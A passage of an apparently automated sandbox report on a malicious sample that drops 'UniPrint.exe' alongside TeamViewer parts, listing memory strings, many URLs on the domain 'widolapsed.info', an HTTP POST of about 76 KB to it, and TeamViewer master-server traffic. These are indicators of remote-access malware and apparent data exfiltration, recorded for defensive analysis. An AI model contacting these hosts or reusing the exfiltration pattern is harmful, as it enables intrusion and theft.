Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/download/beta.aspx
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/download/version_4x/TeamViewerQS.exe
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/download/version_5x/TeamViewerQS.exe
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.533082315.00000000028DE000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/favicon.ico
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/help/connectivity.aspx:
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/help/support.aspxK
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx
Source: UniPrint.exe, 00000004.00000002.531799578.00000000027A0000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000002.533082315.00000000028DE000.00000004.00000001.sdmpString found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx?version=
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%
Source: UniPrint.exe, 00000004.00000002.531799578.00000000027A0000.00000004.00000001.sdmpString found in binary or memory: http://www.teamviewer.com/ja/licensing/commercialuse.aspx
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/licensing/commercialuse.aspx
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.
Source: svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000B.00000003.316757092.000001BF6065A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000002.317241636.000001BF6064E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000B.00000003.316808390.000001BF60641000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000B.00000003.316808390.000001BF60641000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000B.00000003.316757092.000001BF6065A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000003.316700720.000001BF60664000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.316757092.000001BF6065A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000003.295010254.000001BF60631000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000B.00000002.317142598.000001BF60613000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000003.295010254.000001BF60631000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000003.316800598.000001BF60645000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000003.316785328.000001BF60640000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000B.00000003.295010254.000001BF60631000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000B.00000002.317241636.000001BF6064E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.316322889.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.460571183.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/-resource://Microsoft.Microsoft3DViewer4
Source: UniPrint.exe, 00000004.00000003.412925406.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/0p
Source: UniPrint.exe, 00000004.00000003.478775345.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/0pp
Source: UniPrint.exe, 00000004.00000003.325324514.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/1
Source: UniPrint.exe, 00000004.00000003.303052348.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/2i
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/3DViewer_2.1803.8022.0_x64_
Source: UniPrint.exe, 00000004.00000003.316322889.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/64__8wekyb3d8bbwe?ms-resource://Microso
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/8C631A8/
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/8C631A8/.Microsoft3DViewer4
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/8C631A8/9
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/8C631A8/al_cw5n1h2txyewy?m0
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/8C631A8/e
Source: UniPrint.exe, 00000004.00000002.545681944.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/8C631A8/esources/StoreAppN
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/8C631A8/ources/DisplayNamev
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/8C631A8/resource://Microso
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/9
Source: UniPrint.exe, 00000004.00000003.489357888.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/=
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.441746843.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.438725277.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/
Source: UniPrint.exe, 00000004.00000003.489357888.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/.Microsoft3DViewer4
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/2.1803.8022.0_x64_
Source: UniPrint.exe, 00000004.00000003.308537365.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/8
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/9
Source: UniPrint.exe, 00000004.00000003.418618637.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/B
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/E
Source: UniPrint.exe, 00000004.00000003.471440438.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/L
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/R
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/ackageDisplayName
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/al_cw5n1h2txyewy?m0
Source: UniPrint.exe, 00000004.00000003.379200176.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/d.info/B8C631A8/
Source: UniPrint.exe, 00000004.00000003.451977098.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/e
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/esources/StoreAppN
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/leUI/resources/Pkg
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/lopmentPropertiesh
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/lopmentPropertiesl
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/ources/DisplayNamev
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/pName
Source: UniPrint.exe, 00000004.00000003.332650410.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/resource://Microso
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/soft.Microsoft3DVi
Source: UniPrint.exe, 00000004.00000003.348911861.00000000057A7000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/t
Source: UniPrint.exe, 00000004.00000003.316322889.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/wer_2.1803.8022.0_l
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/Q
Source: UniPrint.exe, 00000004.00000003.441746843.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/Wp
Source: UniPrint.exe, 00000004.00000003.451977098.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/a
Source: UniPrint.exe, 00000004.00000003.415242974.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/ameCallableUI/resources/Pkg
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.466393951.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/
Source: UniPrint.exe, 00000004.00000003.446837962.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/3DViewer_2.1803.8022.0_x64_
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/8C631A8/
Source: UniPrint.exe, 00000004.00000003.489357888.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/8C631A8/9
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/8C631A8/resource://Microso
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.424436468.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/
Source: UniPrint.exe, 00000004.00000003.481410319.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/9
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/leUI/resources/Pkg
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/lopmentPropertiesh
Source: UniPrint.exe, 00000004.00000003.415242974.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/ources/DisplayNamev
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/soft.Microsoft3DVi
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/ameCallableUI/resources/Pkg
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/ervice
Source: UniPrint.exe, 00000004.00000003.451977098.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/s/StoreAppName
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/tral_neutral_cw5n1h2txyewy?
Source: UniPrint.exe, 00000004.00000003.323291752.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/vider/Resources/DisplayNamev
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/ervice
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/ft.Microsoft3DViewer_2.1803.8022.0_x64_
Source: UniPrint.exe, 00000004.00000003.481410319.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/i
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/iew.UWP/Resources/StoreAppN
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/s/StoreAppName
Source: UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/tral_neutral_cw5n1h2txyewy?
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/vider/Resources/DisplayNamev
Source: UniPrint.exe, 00000004.00000003.303052348.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/xIdentityProvider/Resources/DisplayNamev
Source: UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/~
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: UniPrint.exe, 00000004.00000002.531799578.00000000027A0000.00000004.00000001.sdmpString found in binary or memory: https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campai
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: https://www.teamviewer.com/licensing/order.aspx?lng=ja
Source: unknownHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76431Content-Type: multipart/form-data; boundary=--------3259937207User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: unknownDNS traffic detected: queries for: ping3.dyngate.com
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70985DF0 InternetOpenW,InternetOpenUrlW,CreateFileW,InternetReadFile,WriteFile,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_70985DF0
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082849&p=10000001&client=DynGate&data=FyQSawCjHqkys5MkoZ6aGJqbGZocGBMkoh6YEyagoZ6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyakoh6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyepnqu0txmXGJiTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=40082849&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082859&p=10000001&client=DynGate&data=FyQS7wAjHqmyuig6sTY0saWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAABSAAApKaCYgAIAAAiAAABb76jy6JCEtP10hWwK5JgAShY7zj+R7R3DOU3+0YZJRajqI5wj4APqnpqJTTfow2rFHUX7lb5rKPxXbMNzymnW3afsLjONOJOSFwYGgTrjCxDXlTyXTROrLUrNxoJ5e0wRdRUaIY3bkkZHP/DCc/GC84acwVg91URMKSdn0IIfWg== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=40082859&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
